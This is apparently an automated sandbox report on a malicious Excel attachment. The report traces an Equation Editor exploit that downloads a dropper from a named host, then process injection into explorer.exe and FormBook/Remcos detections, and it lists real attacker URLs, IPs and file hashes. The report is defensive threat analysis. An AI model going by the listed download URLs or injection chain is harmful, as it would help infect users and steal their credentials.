          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A5513A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A557C63 SetUnhandledExceptionFilter,
          Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.181.41 80
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A550000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A564E44 GetSystemTime,SystemTimeToFileTime,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0038BA60 GetUserNameA,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A55D3B3 GetVersion,
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection612 | Disable or Modify Tools1 | Credential API Hooking1 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information1 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Credential API Hooking1 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information31 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing1 | NTDS | System Information Discovery126 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol22 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rootkit1 | LSA Secrets | Security Software Discovery331 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading111 | Cached Domain Credentials | Virtualization/Sandbox Evasion3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion3 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection612 | Proc Filesystem | System Owner/User Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

          Behavior Graph ID: 321122  Sample: Request for quotation.xlsx  Startdate: 20/11/2020  Architecture: WINDOWS  Score: 100

          Start (signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 16 other signatures)
            -> EQNEDT32.EXE (started)
                 DNS/IP: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam
                 Dropped: C:\Users\user\AppData\Local\...\winlog[1].exe, PE32
                 Dropped: C:\Users\Public\vbc.exe, PE32
                 Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                 -> vbc.exe (started; signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures)
                      -> vbc.exe (started; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection))
                           -> explorer.exe (injected)
                                DNS/IP: www.segredosdocopywriting.com 172.67.181.41, 49168, 80 CLOUDFLARENETUS United States
                                Signature: System process connects to network (likely due to code injection or exploit)
                                -> cmd.exe (started; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements)
                                     -> cmd.exe (started)
                      -> vbc.exe (started)
                      -> vbc.exe (started)
            -> EXCEL.EXE (started)
                 Dropped: C:\Users\...\~$Request for quotation.xlsx, data

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label | Link
Request for quotation.xlsx | 33% | Virustotal | | Browse
Request for quotation.xlsx | 23% | ReversingLabs | Win32.Exploit.CVE-2017-11882 |

          Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\Public\vbc.exe | 100% | Avira | TR/AD.Swotter.yiimo |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 100% | Avira | TR/AD.Swotter.yiimo |
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 33% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos |
C:\Users\Public\vbc.exe | 33% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos |

          Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
7.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

Source | Detection | Scanner | Label | Link
thdyneverwalkachinese2loneinlifekthfnp.ydns.eu | 7% | Virustotal | | Browse

          URLs

Source | Detection | Scanner | Label | Link
http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe | 2% | Virustotal | | Browse
http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe | 100% | Avira URL Cloud | malware |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 | 0% | Avira URL Cloud | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://www.%s.com | 0% | URL Reputation | safe |
http://www.%s.com | 0% | URL Reputation | safe |
http://www.%s.com | 0% | URL Reputation | safe |
http://www.%s.com | 0% | URL Reputation | safe |
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://%s.com | 0% | URL Reputation | safe |
http://%s.com | 0% | URL Reputation | safe |
http://%s.com | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.segredosdocopywriting.com | 172.67.181.41 | true | true | | unknown
thdyneverwalkachinese2loneinlifekthfnp.ydns.eu | 103.141.138.87 | true | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe | true | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp; explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.%s.com | explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | low
http://www.piriform.com/ccleaner | explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp; explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | low
http://%s.com | explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | low
http://www.hotmail.com/oe | explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://auto.search.msn.com/response.asp?MT= | explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

                              Contacted IPs


                              Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.141.138.87 | unknown | Viet Nam | | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
172.67.181.41 | unknown | United States | | 13335 | CLOUDFLARENETUS | true

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:321122
                              Start date:20.11.2020
                              Start time:11:26:18
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 16s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Request for quotation.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSX@13/3@2/2
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 16.4% (good quality ratio 15.6%)
                              • Quality average: 70.9%
                              • Quality standard deviation: 29.4%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
11:27:18 | API Interceptor | 112x Sleep call for process: EQNEDT32.EXE modified
11:27:22 | API Interceptor | 285x Sleep call for process: vbc.exe modified
11:28:11 | API Interceptor | 200x Sleep call for process: cmd.exe modified

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
103.141.138.87 | 8YPssSkVtu.rtf | Get hash | malicious | Browse | mndyneverwalkachinese2loneinlifemnkngr.ydns.eu/chnsfrnd2/winlog.exe

                              Domains

                              No context

                              ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Tyre Pricelist.xlsx | Get hash | malicious | Browse | 103.125.191.5
 | 2eD17GZuWs.exe | Get hash | malicious | Browse | 103.125.191.5
 | Unique food order.xlsx | Get hash | malicious | Browse | 103.125.191.5
 | tt payment proof.xlsx | Get hash | malicious | Browse | 103.125.191.187
 | TIE-3735-2020.xlsx | Get hash | malicious | Browse | 103.125.191.229
 | payslip.s.xlsx | Get hash | malicious | Browse | 103.125.191.187
 | Telex-relase.xlsx | Get hash | malicious | Browse | 103.141.138.120
 | Y0L60XAhvo.rtf | Get hash | malicious | Browse | 103.141.138.122
 | d6pj421rXA.exe | Get hash | malicious | Browse | 103.139.45.59
 | 8YPssSkVtu.rtf | Get hash | malicious | Browse | 103.141.138.87
 | PI098763556299.xlsx | Get hash | malicious | Browse | 103.125.191.229
 | PIT12425009.xlsx | Get hash | malicious | Browse | 103.125.191.229
 | wIeFid8p7Q.exe | Get hash | malicious | Browse | 103.125.189.164
 | Dell ordine-09362-9-11-2020.exe | Get hash | malicious | Browse | 103.139.45.59
 | shipping documents.xlsx | Get hash | malicious | Browse | 103.133.108.6
 | shipping documents.xlsx | Get hash | malicious | Browse | 103.133.108.6
 | EES RFQ 60-19__pdf.exe | Get hash | malicious | Browse | 103.114.107.156
 | Quotation_20CF18909.xlsx | Get hash | malicious | Browse | 103.141.138.122
 | Quotation_20CF18909.xlsx | Get hash | malicious | Browse | 103.141.138.122
 | Z08LsyTAN6.exe | Get hash | malicious | Browse | 103.125.189.164
CLOUDFLARENETUS | MV TBN.exe | Get hash | malicious | Browse | 104.28.5.151
 | PO 20-11-2020.pps | Get hash | malicious | Browse | 172.67.22.135
 | Quotation ATB-PR28500KINH.exe | Get hash | malicious | Browse | 1.1.1.1
 | 23prRlqeGr.exe | Get hash | malicious | Browse | 104.23.98.190
 | RFQ-HSO-76411758-1.jar | Get hash | malicious | Browse | 104.20.23.46
 | RFQ-HSO-76411758-1.jar | Get hash | malicious | Browse | 104.20.22.46
 | iG9YiwEMru.exe | Get hash | malicious | Browse | 104.27.132.115
 | Avion Quotation Request.doc | Get hash | malicious | Browse | 104.22.54.159
 | SUSPENSION LETTER ON SIM SWAP.pdf.exe | Get hash | malicious | Browse | 172.67.131.55
 | Quotation ATB-PR28500KINH.exe | Get hash | malicious | Browse | 1.1.1.1
 | SaXJC2CZ8m.exe | Get hash | malicious | Browse | 104.27.133.115
 | PO91666. pdf.exe | Get hash | malicious | Browse | 172.67.143.180
 | BT2wDapfoI.exe | Get hash | malicious | Browse | 104.23.98.190
 | ara.exe | Get hash | malicious | Browse | 172.65.200.133
 | ORDER FORM DENK.exe | Get hash | malicious | Browse | 104.18.47.150
 | araiki.exe | Get hash | malicious | Browse | 172.65.200.133
 | arailk.exe | Get hash | malicious | Browse | 172.65.200.133
 | https://filmconsultancy.bindwall.ml/mike@filmconsultancy.com | Get hash | malicious | Browse | 104.26.4.196
 | https://trondiamond.co/OMMOM/OM9u8 | Get hash | malicious | Browse | 104.16.18.94
 | https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000 | Get hash | malicious | Browse | 104.16.149.64

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:downloaded
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              IE Cache URL:http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................
                              C:\Users\user\Desktop\~$Request for quotation.xlsx
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):1.4377382811115937
                              Encrypted:false
                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              C:\Users\Public\vbc.exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................

                              Static File Info

                              General

                              File type:CDFV2 Encrypted
                              Entropy (8bit):7.99662784202308
                              TrID:
                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                              File name:Request for quotation.xlsx
                              File size:2205696
                              MD5:109bae1300099a20ad3df28d09095bf1
                              SHA1:dd2c886624df876a75389a5690cf55fd59a0b217
                              SHA256:1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
                              SHA512:a78807b0bc51dd6afa480b2f5321b2bb76356e0c7d9cd421e4a70215ec1479f3d69edeefc8a84b207ba73ba4335afbc697c612d4f64635420ac43e6bdf0c0227
                              SSDEEP:49152:xNGiwgGDTltv9bFH9dsa6H26QjHmeu+YsS4QOwu7CUDKf9VqtBN:xwiwhVXyXxInty4bsNfLqtBN
                              File Content Preview:........................>..................."...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~......................................................

                              File Icon

                              Icon Hash:e4e2aa8aa4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "Request for quotation.xlsx"

                              Indicators

                              Has Summary Info:False
                              Application Name:unknown
                              Encrypted Document:True
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:False
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:False

                              Streams

                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                              General
                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                              File Type:data
                              Stream Size:64
